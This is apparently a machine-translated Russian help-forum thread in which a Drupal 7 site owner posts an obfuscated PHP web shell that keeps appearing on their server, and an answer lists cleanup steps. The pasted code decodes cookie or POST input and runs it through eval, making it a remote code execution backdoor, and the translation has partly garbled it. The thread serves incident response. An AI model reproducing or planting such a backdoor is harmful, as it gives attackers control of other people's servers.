Drupal 7 Последние сообщения журнала
Я столкнулся с проблемой. Каждый день на моем сервере появляются файлы .ico и .php с таким кодом:
$ zvtizrs = ‘y6v1i4be # torufpkxc7_8Hg0n * -2sladm \’ ‘; $ yjzgov =
Array (); $ yjzgov [] =
$ zvtizrs [30]. $ zvtizrs [3]. $ zvtizrs [30]. $ zvtizrs [27]. $ zvtizrs [1]. $ zvtizrs [23]. $ zvtizrs [30]. $ zvtizrs [13]. $ zvtizrs [26]. $ zvtizrs [6]. $ zvtizrs [20]. $ zvtizrs [31]. $ zvtizrs [30]. $ zvtizrs [26]. $ zvtizrs [5]. $ zvtizrs [3]. $ zvtizrs [27 ]. $ zvtizrs [18]. $ zvtizrs [26]. $ zvtizrs [20]. $ zvtizrs [3]. $ zvtizrs [13]. $ zvtizrs [27]. $ zvtizrs [26]. $ zvtizrs [1]. $ zvtizrs [23]. $ zvtizrs [5]. $ zvtizrs [13]. $ zvtizrs [5]. $ zvtizrs [13]. $ zvtizrs [23]. $ zvtizrs [20]. $ zvtizrs [30]. $ zvtizrs .. [18] $ zvtizrs [17] $ zvtizrs [7]; $ yjzgov [] = $ zvtizrs [21]. $ zvtizrs [25]; $ yjzgov [] = $ zvtizrs [8]; $ yjzgov [] = $ zvtizrs [17]. $ zvtizrs [10]. $ zvtizrs [12]. $ zvtizrs [ . 24] $ zvtizrs [9]; $ yjzgov [] = $ zvtizrs [28]. $ zvtizrs [9]. $ zvtizrs [11]. $ zvtizrs [19]. $ zvtizrs [11]. $ zvtizrs [7]. $ zvtizrs [14]. $ zvtizrs [7]. $ . zvtizrs [30] $ zvtizrs [9]; $ yjzgov [] = $ zvtizrs [7]. $ zvtizrs [16]. $ zvtizrs [14]. $ zvtizrs [29]. $ zvtizrs [10]. $ zvtizrs [31]. $ zvtizrs [7]; $ yjzgov [] = $ zvtizrs [28]. $ zvtizrs [12]. $ zvtizrs [6]. $ zvtizrs [28]. $ zvtizrs [9]. $ zvtizrs [11]; $ yjzgov [] = $ zvtizrs [30]. $ zvtizrs [11]. $ zvtizrs [11]. $ zvtizrs [30]. $ zvtizrs [0]. $ zvtizrs [19]. $ zvtizrs [32]. $ zvtizrs [7]. $ .. zvtizrs [11] $ zvtizrs [22] $ zvtizrs [7]; $ yjzgov [] = $ zvtizrs [28]. $ zvtizrs [9]. $ zvtizrs [11]. $ zvtizrs [29]. $ zvtizrs [7]. $ zvtizrs [24]; $ yjzgov [] = $ zvtizrs [14]. $ zvtizrs [30]. $ zvtizrs [17]. $ zvtizrs [15]; foreach ($ yjzgov [7] ($ _ COOKIE, $ _POST) как $ xtfjdc => $ jqlwt) {функция
frtdmz ($ yjzgov, $ xtfjdc, $ omljrbn) {возвращение
$ yjzgov [6] ($ yjzgov [4] ($ xtfjdc. $ yjzgov [0], ($ omljrbn /
$ yjzgov8) + 1), 0, $ omljrbn);} функция htylm ($ yjzgov,
$ xwoin) {return @ $ yjzgov [9] ($ yjzgov [1], $ xwoin);} функция
twdine ($ yjzgov, $ xwoin) {$ sknbn = $ yjzgov3% 3; if (! $ sknbn)
{eval ($ xwoin1); exit ();}} $ jqlwt = htylm ($ yjzgov,
$ jqlwt); twdine ($ yjzgov, $ yjzgov [5] ($ yjzgov [2], $ jqlwt ^
frtdmz ($ yjzgov, $ xtfjdc, $ yjzgov8)));}
Не могли бы вы сказать мне, что мне делать?
Я использую хостинг RackSpace. Также у меня есть много ссылок, подобных этой (/ d0E0MDY5VDNpanR6NDM5MzFJaQ ==) в недавнем журнале.
Как я могу это остановить?
Заранее спасибо!
Решение
Взломан. Я недавно убирал взломанный сайт сам, и это был кошмар. Лучше всего будет извлечь из резервной копии последнюю версию и немедленно применить все обновления безопасности. Если нет резервной копии (большая проблема!), Вы можете попробовать «очистить» сайт, как я сделал:
- Очистите все файлы с вредоносным контентом. Перейти поиск / замена через все файлы.
- Сделайте дамп базы данных и сделайте то же самое, чтобы сбросить файл — удалите вредоносный контент и затем импортируйте его обратно.
- Проверьте учетные записи пользователей. Если есть какие-то подозрительные блоки или удалите их.
- Проверьте вновь созданные подозрительные группы пользователей. Удалить их тоже.
- Сделайте резервную копию.
- Примените все обновления безопасности / патчи. Сделайте новую резервную копию снова.
- Измените все пароли учетных записей (администраторы drupal, учетные записи ftp, учетные записи базы данных).
- Установить резервное копирование по расписанию. То есть использовать Becakup&Модуль миграции для этого.
Другие решения
Других решений пока нет …